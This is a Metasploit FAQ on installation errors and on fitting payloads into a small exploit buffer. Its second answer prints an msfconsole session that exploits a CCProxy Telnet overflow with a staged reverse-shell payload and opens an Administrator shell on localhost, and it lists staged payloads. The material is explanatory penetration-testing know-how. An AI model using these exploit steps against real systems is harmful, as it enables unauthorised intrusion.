Metasploit/Frequently Asked Questions

=Installation=

no such file to load -- openssl (LoadError)
Q: When running Metasploit for the first time, I get the error: no such file to load -- openssl (LoadError)


 * Example:

[~/metasploit]# ./msfgui ./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError) from ./lib/rex/socket/ssl_tcp_server.rb:4 from ./lib/rex/socket/comm/local.rb:5:in `require' from ./lib/rex/socket/comm/local.rb:5 from ./lib/rex/socket.rb:22:in `require' from ./lib/rex/socket.rb:22 from ./lib/rex.rb:71:in `require' from ./lib/rex.rb:71 from ./msfgui:10:in `require' from ./msfgui:10

A: Metasploit requires the Ruby implementation of openssl - not the standard C implementation of openssl used by Apache etc. Install the relevant ruby-openssl library.

pwebster@metasploit:~$ apt-cache search ruby | grep openssl libopenssl-ruby - OpenSSL interface for Ruby libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8 libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9
 * Example (for Debian - check your OS or try using gem):

pwebster@metasploit:~# apt-get install libopenssl-ruby

=Exploit Modules=

Exploit failed: No encoders encoded the buffer successfully
Q: After setting all the required parameters for an exploit module and running exploit, I receive the following error: [-] Exploit failed: No encoders encoded the buffer successfully.


 * Example:

msf > use windows/proxy/ccproxy_telnet_ping msf exploit(ccproxy_telnet_ping) > info

Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow Version: $Revision$ Platform: Windows Privileged: No   License: Metasploit Framework License

Provided by: Patrick Webster 

Available targets: Id Name --                                    0   Windows 2000 Pro SP0 - English 1  Windows 2000 Pro SP1 - English 2  Windows 2000 Pro SP2 - English 3  Windows 2000 Pro SP3 - English 4  Windows 2000 Pro SP4 - English 5  Windows XP SP0/1 - English 6  Windows 2003 Server SP0/1 - English

Basic options: Name  Current Setting  Required  Description ---   ---           RHOST  127.0.0.1        yes       The target address RPORT 23               yes       The target port

Payload information: Space: 200 Avoid: 5 characters

Description: This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command.

msf exploit(ccproxy_telnet_ping) > set TARGET 4 TARGET => 4 msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1 LHOST => 127.0.0.1 msf exploit(ccproxy_telnet_ping) > check [*] The target appears to be vulnerable. msf exploit(ccproxy_telnet_ping) > exploit [-] Exploit failed: No encoders encoded the buffer successfully.

A: The payloads available (show payloads) are determined by the memory 'Space' available for the exploit to use. In the above example, the payload space is: 'Space: 200'. However, the target application does not allow certain characters to be used (usually the null character 0x00 as this denotes the end of a string [character array]). In the example the payload cannot permit five characters: 'Avoid: 5 characters '

When you run the exploit, the payload generators will attempt to fit your desired payload into a space of 200 which excludes 5 specific characters. This is not always possible, and will result in the error: No encoders encoded the buffer successfully.

However, all is not lost. The Metasploit Framework includes the ability to support staged payloads. A staged payload is a significantly smaller payload which, instead of executing your desired action (such as reverse shell), will start a staging platform which can then add to that platform. So in our example, instead of a complete reverse shell, it will:


 * 1) Create the staging platform.
 * 2) Allocate enough memory to hold your desired payload.
 * 3) Obtain the rest of the payload from you.
 * 4) Execute the payload as a whole.

Generally, all the staged exploits are denoted by the '/' after the desired payload. Some examples are:

windows/dllinject/reverse_tcp         Windows Inject DLL, Reverse TCP Stager windows/download_exec/bind_tcp        Windows Executable Download and Execute, Bind TCP Stager windows/exec/find_tag                 Windows Execute Command, Find Tag Ordinal Stager windows/meterpreter/reverse_tcp       Windows Meterpreter, Reverse TCP Stager windows/shell/reverse_tcp             Windows Command Shell, Reverse TCP Stager windows/upexec/bind_tcp               Windows Upload/Execute, Bind TCP Stager windows/vncinject/reverse_ord_tcp     Windows VNC Inject, Reverse Ordinal TCP Stager

So now that we know it cannot fit an 'Inline' payload, we can use a stager instead:

... msf exploit(ccproxy_telnet_ping) > exploit [-] Exploit failed: No encoders encoded the buffer successfully. msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ccproxy_telnet_ping) > exploit [*] Started reverse handler [*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23... [*] Sending stage (474 bytes) [*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016)

Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator>